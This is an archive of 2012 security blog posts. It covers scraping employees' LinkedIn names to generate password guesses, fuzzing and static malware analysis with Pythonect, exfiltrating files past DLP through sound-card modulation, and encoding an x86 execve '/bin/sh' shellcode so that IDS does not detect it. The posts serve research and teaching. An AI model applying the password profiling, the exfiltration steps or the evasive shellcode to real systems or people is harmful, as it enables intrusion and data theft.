Tuesday, December 25, 2012

Scraping LinkedIn Public Profiles for Fun and Profit

Reconnaissance and information gathering are part of almost every penetration testing engagement. Often, the tester will only perform network reconnaissance in an attempt to discover and learn the company's network infrastructure (i.e. IP addresses, domain names, etc.), but there are other types of reconnaissance to conduct, and no, I'm not talking about dumpster diving. Thanks to social networks like LinkedIn, OSINT/WEBINT is now yielding more information. This information can then be used to help the tester test anything from social engineering to weak passwords.

In this blog post I will show you how to use Pythonect to easily generate potential passwords from LinkedIn public profiles. If you haven't heard about Pythonect yet, it is a new, experimental, general-purpose dataflow programming language based on the Python programming language. Pythonect is most suitable for creating applications that are themselves focused on the "flow" of the data. An application that generates passwords from the public LinkedIn profiles of a given company's employees has a coherent and clear dataflow:

(1) Find all the employees' public LinkedIn profiles
(2) Scrape all the employees' public LinkedIn profiles
(3) Crunch all the data into potential passwords

Now that we have the general concept and high-level overview out of the way, let's dive into the details.

Finding all the employees' public LinkedIn profiles will be done via Google Custom Search Engine, a free service by Google that allows anyone to create their own search engine. The idea is to create a search engine that, when searching for a given company name, will return all the employees' public LinkedIn profiles. How? When creating a Google Custom Search Engine it's possible to restrict the search results to a specific site (i.e. 'Sites to search'), and we're going to limit ours to: linkedin.com. It's also possible to fine-tune the search results even further, e.g. uk.linkedin.com to find only employees from the United Kingdom.

Access to the newly created Google Custom Search Engine will be made using a free API key obtained from the Google API Console. Why go through the Google API? Because it allows automation (no CAPTCHAs), and it also means that the search-result pages will be returned as JSON (as opposed to HTML). The only catch with using the free API key is that it's limited to 100 queries per day, but it's possible to buy an API key that will not be limited.

Scraping the profiles is a matter of iterating over all the hCards in all the search-result pages, and extracting the employee name from each hCard. What is an hCard? hCard is a microformat for publishing the contact details of people, companies, organizations, and places. hCard is also supported by social networks such as Facebook, Google+, and LinkedIn for exporting public profiles. Google (when indexing) parses hCards, and when relevant, uses them in search-result pages. In other words, when search-result pages include LinkedIn public profiles, they will appear as hCards, and can be easily parsed.

Let's see the implementation of the above:
#!/usr/bin/python
#
# Copyright (C) 2012 Itzik Kotler
#
# scraper.py is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# scraper.py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with scraper.py.  If not, see <http://www.gnu.org/licenses/>.

"""Simple LinkedIn public profiles scraper that uses Google Custom Search"""

import urllib
import simplejson


BASE_URL = "https://www.googleapis.com/customsearch/v1?key=<YOUR GOOGLE API KEY>&cx=<YOUR GOOGLE SEARCH ENGINE CX>"


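def __get_all_hcards_from_query(query, index=0, hcards=None):

    # Start from a fresh dictionary on each top-level call; a mutable
    # default argument would be shared between unrelated calls.
    if hcards is None:

        hcards = {}

    url = query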

    if index != 0:

        url = url + '&start=%d' % (index)

    json = simplejson.loads(urllib.urlopen(url).read())

    if json.has_key('error'):

        print "Stopping at %s due to Error!" % (url)

        print json

    else:

        for item in json['items']:

            try:

                hcards[item['pagemap']['hcard'][0]['fn']] = item['pagemap']['hcard'][0]['title']

            except KeyError as e:

                pass

        if json['queries'].has_key('nextPage'):

            return __get_all_hcards_from_query(query, json['queries']['nextPage'][0]['startIndex'], hcards)

    return hcards


def get_all_employees_by_company_via_linkedin(company):

    queries = ['"at %s" inurl:"in"', '"at %s" inurl:"pub"']

    result = {}

    for query in queries:

        _query = query % company

        result.update(__get_all_hcards_from_query(BASE_URL + '&q=' + _query))

    return list(result)
Replace <YOUR GOOGLE API KEY> and <YOUR GOOGLE SEARCH ENGINE CX> in the code above with your Google API Key and Google Search Engine CX respectively, save it to a file called scraper.py, and you're ready!
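
The extraction step can also be tried offline, without an API key. The following is a minimal Python 3 sketch (the scraper above is Python 2). The names extract_hcards and sample_response are made up for illustration, and the sample data is hypothetical; it only mimics the items / pagemap / hcard shape that scraper.py reads.

```python
def extract_hcards(response):
    """Map each hCard full name ('fn') to its 'title' for one result page."""
    hcards = {}
    for item in response.get('items', []):
        try:
            card = item['pagemap']['hcard'][0]
            hcards[card['fn']] = card['title']
        except (KeyError, IndexError):
            # Result without a complete hCard: skip it.
            continue
    return hcards


# Hypothetical data, shaped like the fields used by scraper.py.
sample_response = {
    'items': [
        {'pagemap': {'hcard': [{'fn': 'Jane Doe', 'title': 'Engineer at Example'}]}},
        {'pagemap': {}},  # no hCard in this result
    ]
}

print(extract_hcards(sample_response))
```

Using response.get('items', []) means a page with no results simply yields an empty dictionary instead of raising an exception.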

To kick-start, here is a simple program in Pythonect (that utilizes the scraper module) that searches for and prints the full names of all the employees of the Pythonect company:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> print
The output should be:
Itzik Kotler
In my LinkedIn profile, I have listed Pythonect as a company that I work for, and since no one else is working there, a search for all the employees of the Pythonect company brings up only my LinkedIn profile.
For demonstration purposes I will keep using this example (i.e. "Pythonect" company, and "Itzik Kotler" employee), but go ahead and replace Pythonect with other, more popular, company names and see the results.

Now that we have a working skeleton, let's take its output and start crunching it. Keep in mind that every "password generation formula" is merely a guess. The examples below are only a sampling of what can be done. There are, obviously, many more possibilities and you are encouraged to experiment. But first, let's normalize the output, so that it is consistent before any operations are performed on it:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> string.lower(''.join(_.split()))
The normalization procedure is short and simple: convert the string to lowercase and remove any spaces, and so the output should be now:
itzikkotler
As for data manipulation, out of the box (thanks to the Python Standard Library) we've got itertools and its combinatoric generators. Let's start by applying itertools.product:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> string.lower(''.join(_.split())) -> itertools.product(_, repeat=4) -> print
The code above will generate and print every 4-character password made from the letters i, t, z, k, o, l, e, and r. However, it won't cover passwords that contain uppercase letters. So here's a simple and straightforward implementation of a cycle_uppercase function that walks over the input letters and, for each position, yields a copy of the input with that letter in uppercase:
def cycle_uppercase(i):
    s = ''.join(i)
    for idx in xrange(0, len(s)):
        yield s[:idx] + s[idx].upper() + s[idx+1:]
To use it, save it to a file called itertools2.py, and then simply add it to the Pythonect program after the itertools.product(_, repeat=4) block, as follows:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin \
    -> string.lower(''.join(_.split())) \
        -> itertools.product(_, repeat=4) \
            -> itertools2.cycle_uppercase \
                -> print
Now, the program will also cover passwords that include a single uppercase letter. Moving on with the data manipulation, sometimes the password might contain symbols that are not found within the scraped data. In this case, it is necessary to build a step that will take the input and add symbols to it. Here is a short and simple one, implemented as a list comprehension:
[_ + postfix for postfix in ['123','!','$']]
To use it, simply add it to the Pythonect program after the itertools2.cycle_uppercase block, as follows:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin \
    -> string.lower(''.join(_.split())) \
        -> itertools.product(_, repeat=4) \
            -> itertools2.cycle_uppercase \
                -> [_ + postfix for postfix in ['123','!','$']] \
                    -> print
The result is that the program now appends the strings '123', '!', and '$' to every generated password, which may increase the chances of guessing the user's password, or not, depending on the password :)
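
For readers without Pythonect installed, the same flow can be approximated in plain Python 3. This is only a sketch: the candidates function and its parameters are hypothetical names, and removing repeated letters before calling itertools.product is an addition of this sketch, not something the Pythonect program does.

```python
import itertools


def normalize(name):
    """Lowercase the name and drop all whitespace."""
    return ''.join(name.split()).lower()


def cycle_uppercase(chars):
    """Yield copies of the input with one letter uppercased at a time."""
    s = ''.join(chars)
    for idx in range(len(s)):
        yield s[:idx] + s[idx].upper() + s[idx + 1:]


def candidates(name, length=4, postfixes=('123', '!', '$')):
    """Yield password guesses built from the letters of `name`."""
    # sorted(set(...)) drops repeated letters so no tuple is produced twice.
    letters = sorted(set(normalize(name)))
    for combo in itertools.product(letters, repeat=length):
        for variant in cycle_uppercase(combo):
            for postfix in postfixes:
                yield variant + postfix


guesses = list(candidates('Itzik Kotler'))
print(len(guesses))
print(guesses[:3])
```

Because everything is a generator, the guesses can also be streamed straight into a file or another tool instead of being collected into a list.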

To summarize, it's possible to take OSINT/WEBINT data on a given person or company and use it to generate potential passwords, and it's easy to do with Pythonect. There are, of course, many different ways to manipulate the data into passwords and many programs and filters that can be used. In this aspect, Pythonect being a flow-oriented language makes it easy to experiment and research with different modules and programs in a "plug and play" manner.

Monday, September 17, 2012

Fuzzing Like A Boss with Pythonect

In my previous post, Automated Static Malware Analysis with Pythonect, I wrote about how to use Pythonect to automate static malware analysis. In this post I'll describe how to use Pythonect and all of its perks to fuzz file formats, network protocols, and command-line arguments. The examples provided are only a sampling of what can be done. There are, obviously, many more possibilities and you are encouraged to experiment. Before you read this tutorial you should have at least a basic knowledge of fuzz testing, Python, and Pythonect (I recommend reading the Pythonect Tutorial: Learn By Example).

Let's see some code!
['A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    -> [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)
The code above tries to fuzz the command-line arguments of a *nix command-line tool (e.g. /bin/ping). Let's go line by line and explain what's going on with these 3 lines of code.

The first line defines a list of inputs to try (i.e. ['A', 'a', '0', ...]), the second line defines a list of length parameters (i.e. [256, 512, 1024, ...]), and the last line executes the command-line tool with the generated argument as argv[1] (e.g. /bin/ping "AAAAAA ... 256 times"). In addition, this fuzzer is multi-threaded and uses asynchronous communication. What does that mean? It means that it doesn't wait for a thread to finish before continuing with the loop, and as a result, it's not guaranteed to fuzz in sorted order (i.e. A * 256, A * 512, A * 1024, ...).

You can easily extend the code above to include testing for format string vulnerabilities:
['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    -> [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)
If you want the format string testing inputs to run first (i.e. fuzz in sorted order), change the forward pipe operator from asynchronous to synchronous:
['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    | [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)
If you also want the length parameters to run in sorted order (i.e. '%s' * 256, '%s' * 512, '%s' * 1024, ...), change the 2nd forward pipe operator to synchronous as well:
['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    | [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        | os.system('/bin/ping ' + _)
Keep in mind that the latter is no longer multi-threaded (because it waits for both the input and the length threads to finish).
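
The fully synchronous variant corresponds to a pair of nested loops. Here is a minimal plain Python 3 sketch of it; build_cases and run_case are hypothetical helper names, the seed list is shortened, and the 10-second timeout is an arbitrary choice. Unlike os.system(), passing a list to subprocess.run() bypasses the shell, so characters such as '*' or '$' should reach the tool unchanged.

```python
import subprocess

SEEDS = ['%s', '%n', 'A', 'a', '0', '!']
LENGTHS = [256, 512, 1024, 2048, 4096]


def build_cases(seeds, lengths):
    """Return every seed repeated at every length, in nested-loop order."""
    return [seed * n for seed in seeds for n in lengths]


def run_case(argument, tool='/bin/ping'):
    """Run the tool once with `argument` as argv[1]; return its exit status."""
    # The argument list is handed to the tool directly, with no shell involved.
    completed = subprocess.run([tool, argument], capture_output=True, timeout=10)
    return completed.returncode


cases = build_cases(SEEDS, LENGTHS)
print(len(cases), len(cases[0]))
# for case in cases:            # uncomment to actually run the fuzzer
#     print(run_case(case))
```

On POSIX systems a negative return code means the tool was terminated by a signal, which is usually the interesting outcome when fuzzing.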

Moving on, here is an example of a generic file format fuzzer:
open('dana.jpg', 'r').read() \
    -> itertools.permutations \
        -> open('output_' + hex(_.__hash__()) + '.jpg', 'w').write(''.join(_))
The code above reads the content of dana.jpg and passes it to itertools.permutations, and that in turn returns dana.jpg-length tuples, all possible orderings, no repeated elements.
Each dana.jpg-length tuple is saved into a unique output_ prefixed file. Afterwards, testing the JPEG libraries is as easy as: eog *.jpg or zgv *.jpg
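
Note that an n-byte input has n! orderings, so for a real image the generator will never be exhausted. A bounded variant can be sketched in plain Python 3 with itertools.islice; first_permutations and its limit parameter are hypothetical names used only for this example.

```python
import itertools


def first_permutations(data, limit):
    """Return at most `limit` reorderings of `data` as bytes objects."""
    # itertools.permutations is lazy; islice stops it after `limit` items.
    perms = itertools.islice(itertools.permutations(data), limit)
    return [bytes(p) for p in perms]


# A 3-byte stand-in for the file content; a real JPEG has far too many
# orderings (n! for n bytes) to enumerate in full.
for mutated in first_permutations(b'abc', 4):
    print(mutated)
```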

This is another example of a generic file format fuzzer:
open('dana.jpg', 'r').read() \
    -> [list(_) + [os.urandom(1) for n in xrange(0, len(_))]] \
        -> [tuple(random.sample(_, len(_)/2)) for i in xrange(0, len(_)*2)] \
            -> open('output_' + hex(_.__hash__()) + '.jpg', 'w').write(''.join(_))
The code above reads the content of dana.jpg, appends a dana.jpg-length buffer of random bytes to it, and then draws dana.jpg-length*4 random samples from the combined buffer, each of them dana.jpg-length bytes long.
Each dana.jpg-length chunk is saved into a unique output_ prefixed file. Again, testing the JPEG libraries is as easy as: eog *.jpg or zgv *.jpg
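
The same idea in plain Python 3, as a rough sketch: random_mutations, count, and seed are hypothetical names, and the 8-byte input is a stand-in for a real file. The seed only fixes which positions are sampled; the noise bytes come from os.urandom() and differ on every run.

```python
import os
import random


def random_mutations(data, count, seed=None):
    """Return `count` buffers of len(data) bytes sampled from data plus noise."""
    rng = random.Random(seed)
    # Pool = the original bytes followed by the same number of random bytes.
    pool = list(data) + list(os.urandom(len(data)))
    return [bytes(rng.sample(pool, len(data))) for _ in range(count)]


mutations = random_mutations(b'\xff\xd8\xff\xe0JFIF', count=3, seed=1)
for m in mutations:
    print(m.hex())
```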

Last but not least, here's a network protocol (FTP) fuzzer:
ftplib.FTP('localhost') \
    -> _.login().startswith('230') \
    -> [_.mkd(s) for s in reduce(lambda x,y: x+y, map(lambda c: [chr(c) * 2**l for l in range(8,13)], xrange(1, 255)))]
The code above uses the ftplib module to connect to an FTP site, logs in as anonymous, generates strings from each byte value 1-254 repeated 256, 512, and so on up to 4096 times, and passes each string as the pathname for MKD.
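
The reduce/map/lambda expression is dense, so here is the payload generation alone, unrolled into a plain Python 3 generator. It is a sketch that never touches the network; mkd_payloads and its parameters are hypothetical names.

```python
def mkd_payloads(first=1, last=254, exponents=range(8, 13)):
    """Yield each byte value repeated 2**exp times, as the FTP example does."""
    for code in range(first, last + 1):
        for exp in exponents:
            yield chr(code) * 2 ** exp


payloads = list(mkd_payloads())
print(len(payloads), len(payloads[0]), len(payloads[-1]))
```

Each payload could then be handed to ftplib's mkd() inside a try/except block, so that one rejected pathname does not stop the run.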

Lastly, if you have suggestions on how we can make Pythonect better, head over to Pythonect's github page and create a new ticket or fork. Enjoy the examples and have fun with Pythonect!

Tuesday, August 21, 2012

Automated Static Malware Analysis with Pythonect

About 5 months ago I released the first version of Pythonect - a new, experimental, general-purpose high-level dataflow programming language based on Python, written in Python.
It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python.

Crazy? Most definitely. And yet, strangely enough, it works!

Pythonect, being a dataflow programming language, treats data as something that originates from a source, flows through a number of processing components, and arrives at some final destination.
As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented applications comes from the realm of real-time signal processing, e.g. a video signal processor which perhaps starts with a video input, modifies it through a number of processing components (video filters), and finally outputs it to a video display.

As with video, malware analysis can be expressed as a network of different components, such as disassemblers, regular expressions, and debuggers, that are connected by a number of communication channels.
The benefits, and perhaps the greatest incentives, of expressing malware analysis this way are scalability and parallelism. The different components in the network can be rearranged to create entirely unique dataflows without necessarily requiring the relationship to be hardcoded. Also, the design and concept of components make it easier to run on distributed systems and parallel processors.

In this tutorial I will show you how to automate static malware analysis using Pythonect. The examples will be simple enough that you can extend them if you want to.
Before you read this tutorial you should have at least a basic knowledge of x86 Assembly, Python, and Pythonect (I recommend reading the Pythonect Tutorial: Learn By Example).

Note: I have decided to go with static malware analysis because it's easier to demonstrate, and to use open source tools because they are more accessible. Nonetheless, this does not go to show that Pythonect or dataflow programming cannot be used to automate dynamic malware analysis, or integrated with a commercial software. The only limit is your imagination.

There isn't exactly a "Hello, world" program in the malware analysis realm, so I will start with my equivalent to "Hello, world", an example program that computes a MD5 digest of a file:
"MALWARE.EXE" -> os.system("/usr/bin/md5sum " + _)
The program above uses the md5sum program of GNU coreutils to compute and print MALWARE.EXE's MD5 digest. Let's extend it to compute the MALWARE.EXE's SHA1 digest as well:
"MALWARE.EXE" -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]
The new program above uses the md5sum and sha1sum of GNU coreutils to compute and print MALWARE.EXE's MD5 and SHA1 digests. Let's keep improving it:
sys.argv[1] -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]
Now, the new program reads the malware filename from a command-line argument. To run the script just save it (e.g. md5_and_sha1_sums) and run the Pythonect interpreter like this:
% /usr/local/bin/pythonect md5_and_sha1_sums /bin/ls
92385e9b8864032488e253ebde0534c3  /bin/ls
8800fee57584ed1c44b638225c2f1eec818a27c2  /bin/ls
Often, the goal is to handle the large volume of malware samples collected each day, so let's change the program to work on all the executables (i.e. *.EXE) in the current directory:
glob.glob('*.EXE') -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]
Of course, it can be further fine-tuned or customized at will. Also, it's worth mentioning that the program above is multi-threaded, meaning that each file starts a new thread.
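
For comparison, a similar per-file parallelism can be sketched in plain Python 3 with hashlib and a thread pool instead of external tools. The helper names digests and hash_all are hypothetical, and the 64 KB chunk size is an arbitrary choice.

```python
import glob
import hashlib
from concurrent.futures import ThreadPoolExecutor


def digests(path, chunk_size=65536):
    """Return (path, md5 hex, sha1 hex), reading the file in chunks."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, 'rb') as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b''):
            md5.update(chunk)
            sha1.update(chunk)
    return path, md5.hexdigest(), sha1.hexdigest()


def hash_all(pattern='*.EXE'):
    """Hash every file matching `pattern` using a pool of worker threads."""
    with ThreadPoolExecutor() as pool:
        return list(pool.map(digests, sorted(glob.glob(pattern))))


for path, md5_hex, sha1_hex in hash_all():
    print(md5_hex, sha1_hex, path)
```

Reading in chunks keeps memory use flat even for large samples, and pool.map() returns the results in the same order as the sorted file list.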

So far, I have used Python's os.system() function in all of the example programs. os.system() is handy when it comes to writing small scripts: it executes a command in a subshell and returns its exit status.
But since there is little interest in passing the exit status to another component, a different command-executing function is needed when building an advanced script: subprocess.check_output().
"MALWARE.EXE" -> subprocess.check_output(['/usr/bin/md5sum', _]) -> print
Much like the original example program, the program above uses the md5sum program of GNU coreutils to compute MALWARE.EXE's MD5 digest, but prints the result using Pythonect's print() function.

Moving on. The Python Standard Library is a rich set of libraries (modules and packages) for tackling just about every programming task. For example:
"MALWARE.EXE" -> open(_, 'r').read() -> hashlib.md5 -> _.hexdigest() -> print
The program above is an alternative to the original example program: it uses Python's hashlib.md5() function to compute MALWARE.EXE's MD5 digest and Pythonect's print() to display it. What else?
"MALWARE.EXE" \
    -> open(_, 'r').read() \
    -> [re.finditer("\xcc", _), re.finditer("\xcd\x03", _)] \
    -> print "Found INT3 between Offset #%d and #%d" % _.span(0)
The program above searches for all the INT 3 instructions occurrences in MALWARE.EXE file, and prints the offsets of the beginning and end of each matched record.
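
The same scan can be sketched in plain Python 3, where the file content and the patterns are bytes. The find_int3 function and the sample buffer are made up for this example. Keep in mind that a raw byte scan like this also matches 0xCC bytes that happen to be data or operands rather than instructions.

```python
import re

# INT 3 has two encodings: the one-byte 0xCC and the two-byte 0xCD 0x03.
INT3_PATTERNS = (b'\xcc', b'\xcd\x03')


def find_int3(data):
    """Return sorted (start, end) offsets of every INT 3 encoding in `data`."""
    spans = []
    for pattern in INT3_PATTERNS:
        spans.extend(m.span() for m in re.finditer(re.escape(pattern), data))
    return sorted(spans)


sample = b'\x90\xcc\x90\xcd\x03\x90'   # made-up bytes, not a real binary
for start, end in find_int3(sample):
    print("Found INT3 between Offset #%d and #%d" % (start, end))
```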

Now, for the times when the Python Standard Library doesn't have what you're looking for, you can always implement your own in Python:
import math

def entropy(data):
    entropy = 0
    if data:
        for x in range(2**8):
            p_x = float(data.count(chr(x))) / len(data)
            if p_x > 0:
                entropy += - p_x * math.log(p_x, 2)
    return entropy
The above is an implementation of Shannon's entropy equation in Python. To use it, simply save it (e.g. entropy.py), and reference it in a program:
"MALWARE.EXE" -> open(_, 'r').read() -> entropy.entropy -> print
The program above uses entropy() of entropy.py to measure and print MALWARE.EXE's entropy. To conclude this tutorial, let's tweak it one more time:
"MALWARE.EXE" -> subprocess.check_output(['/usr/bin/objcopy', '-O', 'binary', '-j', '.text', _, '/dev/stdout']) -> entropy.entropy -> print
Now, the program above uses entropy() of entropy.py to measure and print MALWARE.EXE's .text section (using objcopy of GNU binutils) entropy.
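
For readers on Python 3, where file content read in binary mode is a bytes object, an equivalent entropy function can be sketched as follows. Using collections.Counter is a design choice of this sketch: it makes a single pass over the data instead of 256 separate count() calls.

```python
import math
from collections import Counter


def entropy(data):
    """Return the Shannon entropy of `data` in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    probabilities = (count / total for count in Counter(data).values())
    return sum(-p * math.log2(p) for p in probabilities)


print(entropy(b'AAAA'))
print(entropy(bytes(range(256))))
```

A buffer with a single repeated byte scores at the bottom of the range and a buffer where every byte value is equally likely scores at the top; packed or encrypted sections tend to sit near the top.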

Pythonect is still under heavy development; there's a ton of unimplemented features and even more bugs. It's not ready for production yet, but you can still start to play with it and have plenty of fun!

That's all for now.

Sunday, July 8, 2012

Modulation and Data Loss Prevention (DLP) Solutions

Last year, my colleague Iftach (Ian) Amit and I gave a talk called 'Sounds Like Botnets' at DEFCON 19 and BSides Las Vegas conferences. Here is a link to the slides [PDF].
In the talk, we demonstrated how a combination of modulation and VoIP can be used to bypass enterprise security controls. Here are the links to poc #1 and poc #2.
This year, I won't be able to make it to Las Vegas for any of the conferences. Dwelling on the past, I have decided to revisit the 'Sounds Like Botnets' talk and add some content to it.

Data loss prevention (DLP) solutions are designed to detect and prevent potential data breach incidents. There are many types of DLP systems; the one that I'll address is Endpoint DLP software.
Endpoint DLP software runs on end-user workstations and monitors and controls access to physical devices (e.g. mobile devices), among other things. But does it monitor the sound card?
It is possible to modulate data into sound, and then to play it out from the workstation (using the sound card) to a 3rd party such as a voice recorder or any mobile phone with an external microphone input.
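
To illustrate what "modulating data into sound" can mean, here is a minimal Python 3 sketch of binary frequency-shift keying (FSK), where each bit becomes a short burst of one of two tones. This is a generic textbook scheme and not necessarily what the proof-of-concept scripts do; the sample rate, bit length, and tone frequencies are all assumptions chosen so that both tones fit a whole number of cycles into one bit.

```python
import math

SAMPLE_RATE = 8000      # samples per second
SAMPLES_PER_BIT = 80    # 10 ms per bit, i.e. 100 bits per second
FREQ_ZERO = 1000        # tone (Hz) that encodes a 0 bit
FREQ_ONE = 2000         # tone (Hz) that encodes a 1 bit


def modulate(data):
    """Turn bytes into a list of float samples, one tone burst per bit."""
    samples = []
    for byte in data:
        for shift in range(7, -1, -1):           # most significant bit first
            freq = FREQ_ONE if (byte >> shift) & 1 else FREQ_ZERO
            for n in range(SAMPLES_PER_BIT):
                samples.append(math.sin(2 * math.pi * freq * n / SAMPLE_RATE))
    return samples


def tone_power(chunk, freq):
    """Correlate a chunk with cosine and sine at `freq`; return the power."""
    step = 2 * math.pi * freq / SAMPLE_RATE
    i = sum(s * math.cos(step * n) for n, s in enumerate(chunk))
    q = sum(s * math.sin(step * n) for n, s in enumerate(chunk))
    return i * i + q * q


def demodulate(samples):
    """Recover the bytes by picking the stronger tone in each bit slot."""
    bits = []
    for start in range(0, len(samples), SAMPLES_PER_BIT):
        chunk = samples[start:start + SAMPLES_PER_BIT]
        one = tone_power(chunk, FREQ_ONE) > tone_power(chunk, FREQ_ZERO)
        bits.append(1 if one else 0)
    out = bytearray()
    for start in range(0, len(bits) - 7, 8):
        byte = 0
        for bit in bits[start:start + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


message = b'secret'
print(demodulate(modulate(message)) == message)
```

The samples could be scaled to 16-bit integers and written out with the standard wave module; a real recording would also need synchronization and some tolerance for noise, which this sketch leaves out.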

Modulation vs. DLP #1:

Keep in mind that this is a proof of concept, so it's not going to work 100% of the time. If it's not working, try: (a) a smaller document/payload or (b) a different recording device.

To modulate:
  • Download data2sound.py
  • Pick a file
  • Modulate the file:
    $ ./data2sound.py -i secret.txt -o foobar.wav
  • Connect the recording device to the workstation sound card (Headphones output)
  • Start recording on the recording device
  • Play the generated WAV file (i.e. foobar.wav)
  • Stop the recording on the recording device
To demodulate:
  • Download sound2data.py

  • Then, if possible, copy the file as is from the recording device to the computer, and demodulate it:
    $ ./sound2data.py -i foobar.wav -o secret.txt
    If not, try the following steps:
    • Connect the recording device to the workstation sound card (Microphone input)
    • Start recording on the workstation
    • Play the file on the recording device
    • Stop the recording on the workstation
    • Demodulate the file
Try this (at home, and at your own risk) and post a comment with what file and sound card equipment you tried, and whether it worked for you or not. Now, the next method is really more theory than practice.

Modulation vs. DLP #2:

By bridging between the computer soundcard and a smart phone broadband modem, it is possible to upgrade the previous method to be an on-line, or real time one. In other words, Build Your Own Modem.

The setup:
  • Connect the computer headphone output into the smart phone external microphone input. This way, the computer can output signal to the smart phone.
  • Connect the smart phone headphone output into the computer external microphone input. This way, the smart phone can output signal to the computer.
This should (in theory) make sure that a signal can go from side to side. Now, let's see what each side should do.

On the smart phone:
  • Call the remote site
  • (The caller signal should be sent to the computer via the headphone output; if not, try playing with the settings)
  • (The callee signal should be received from the computer via the microphone input; if not, try playing with the settings)
There's also the option of pairing (via Bluetooth) the computer and the smart phone: The computer identifies as a headset and gains access to smart phone speaker/microphone. But it's preventable by DLP.

On the computer:
  • Modulate the file you wish to transfer
  • Play the generated WAV file
That's the basic idea. Of course, you can install software on the computer that will modulate-demodulate (i.e. MODEM) on the fly, making it possible to receive transmissions from the remote site and respond to them.

Before wrapping up this post, I'd like to give a big shout out to Mickey Shaktov and Iftach (Ian) Amit, both of whom will be presenting this year at Black Hat USA. Go see their talks, you won't be disappointed!

Saturday, June 23, 2012

Decoderless Shellcode Encoding

Today, it's almost impossible to send an unencoded exploit payload over the wire without triggering a Network Intrusion Prevention System (IPS) or Network Intrusion Detection System (NIDS) on the way.
The obvious solution is to encode the payload before sending it. A typical encoder yields a new payload that contains both the old payload in encoded form and a decoder function to decode it.
Now, the encoded payload is "free" of any malicious patterns so it won't trigger any alarm, but what about the decoder? It becomes the weakest link and the new trigger for alarm.

Almost every encoding method requires a decoder to be embedded in the payload. The tricky part is how to encode the decoder so it won't trigger any alarm? And is it even possible?
The short answer is yes. There are some ways to do it, and one of them is instruction substitution: replacing an instruction with a semantically equivalent, but different, instruction.
But if instruction substitution is good enough for encoding decoders, is it not good enough for encoding the payload itself? Yes, it is good enough to encode the payload as well.
Applying instruction substitution to a payload results in an encoded payload with no decoder in it. A decoderless encoded shellcode.

Let's take the following shellcode (execve "/bin/sh", 23 bytes) as an input:
.section .text
.global _start
_start:
    push $0xb
    popl %eax
    cdq
    push %edx
    push $0x68732f2f
    push $0x6e69622f
    mov %esp,%ebx
    push %edx
    push %ebx
    mov %esp, %ecx
    int $0x80
The first instruction is:
push $0xb
The goal of this instruction is to store the byte 0xB in the stack. One way to encode this instruction will be:
push $0xc
decb (%esp)
This way, the value (i.e. 0xB) is no longer visible. Another way to encode this instruction will be:
sub $0x4, %esp
movl $0xfffffff4, (%esp)
notl (%esp)
Here, the PUSH instruction is no longer visible. The reason I'm using 0xFFFFFFF4 (i.e. -12, ~0xB) and not 0xB is to avoid NULL bytes, but if NULL is not a problem then:
sub $0x4, %esp
movl $0x0000000b, (%esp)
Now, not only single instructions can be encoded. It's also possible to group a few instructions together and encode it. For example:
push $0xb
popl %eax
The goal of this instruction group is to store the value 0x0000000B in register EAX. One way to encode it will be:
movl $0xfff3133c, %eax
xorl $0xfff31337, %eax
This way, the value (i.e. 0xB, or 0x0000000B) is no longer visible. Another way to encode this instruction group will be:
pusha
movl $0xfffffff4, 0x1c(%esp)
notl 0x1c(%esp)
popa
Here, both, the referenced register (i.e. EAX) and the value (i.e. 0xB, or 0x0000000B) are not visible.
The advantage of this approach is that it can be recursive, each output can be used as input for another pass. For example:
push $0xb
Yields:
push $0xc
decb (%esp)
That can yield:
sub $0x4, %esp
movl $0xfffffff3, (%esp)
notl (%esp)
decb (%esp)
And so on.
The disadvantage of this approach is that it's not size-oriented (the output might be bigger than the input) and it will not work on the entire instruction set (e.g. INT).
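
The arithmetic behind the NOT and DEC substitutions is easy to check in Python 3. The sketch below is not shcfuscator; not32, dec_low_byte, and encode_push_with_not are hypothetical helpers written only for this illustration.

```python
MASK32 = 0xFFFFFFFF


def not32(value):
    """Bitwise NOT truncated to 32 bits, like NOTL."""
    return ~value & MASK32


def dec_low_byte(value):
    """Decrement only the lowest byte, like DECB on a little-endian dword."""
    return (value & ~0xFF & MASK32) | ((value - 1) & 0xFF)


def encode_push_with_not(imm):
    """Return GAS lines that leave `imm` on the stack without using PUSH."""
    return [
        'sub $0x4, %esp',
        'movl $0x%08x, (%%esp)' % not32(imm),
        'notl (%esp)',
    ]


print(hex(not32(0xfffffff4)))
print(hex(dec_low_byte(0xc)))
print('\n'.join(encode_push_with_not(0xb)))
```

Since DECB touches only the lowest byte, the push-and-decrement substitution is safe only when adding one to the immediate does not carry into the second byte.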

